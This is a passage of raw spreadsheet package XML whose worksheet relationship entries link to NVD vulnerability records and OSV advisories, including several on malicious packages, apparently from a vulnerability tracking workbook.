Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84894" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84895" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85024" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85644" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86003" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86043" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87859" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88058" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88815" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88816" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88932" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9029" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90979" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91006" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91095" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91096" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9162" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-96760" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17220" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-456v-xq2p-r4cj" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17212" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17204" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17205" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17207" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17221" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17219" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GO-2026-6538" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17218" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17222" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17206" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17210" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17216" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17217" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17213" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17214" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17215" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17223" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17224" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17225" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17226" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17227" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17228" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17229" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17230" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17231" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17232" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17233" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17234" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17235" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17236" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17237" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17238" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17239" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17240" TargetMode="External" Id="rId409" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88771" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88772" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88773" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88775" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88776" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88777" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100886" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101001" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101090" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101045" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100872" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100896" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101060" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101049" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101050" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101064" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100869" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100908" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88778" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101032" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88774" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101059" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101085" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101086" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101056" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101063" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100902" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100874" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100875" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100889" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100890" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100892" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100893" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100895" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100901" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100903" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100906" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100909" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100868" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100904" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101046" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101051" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101089" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100877" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100878" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100883" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100884" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100887" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100898" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100899" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100880" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100881" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100655" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100656" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100657" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100658" TargetMode="External" Id="rId56" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet6.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88771" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88772" TargetMode="External" Id="rId2" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet7.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101072" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101076" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101077" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102240" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101037" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101038" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82377" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85526" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87799" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82384" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90924" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101354" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12342" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85185" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88804" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19759" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81867" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100752" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101039" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101075" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101108" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101110" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101891" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73640" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86102" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102422" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73642" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101081" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101187" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101260" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101261" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101262" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101263" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101264" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101894" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102268" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102361" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49994" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82378" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101074" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101860" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12264" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12265" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12268" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12269" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78424" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85134" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86595" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86950" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87741" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88808" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90926" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100371" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48100" TargetMode="External" Id="rId54" /><Relationship 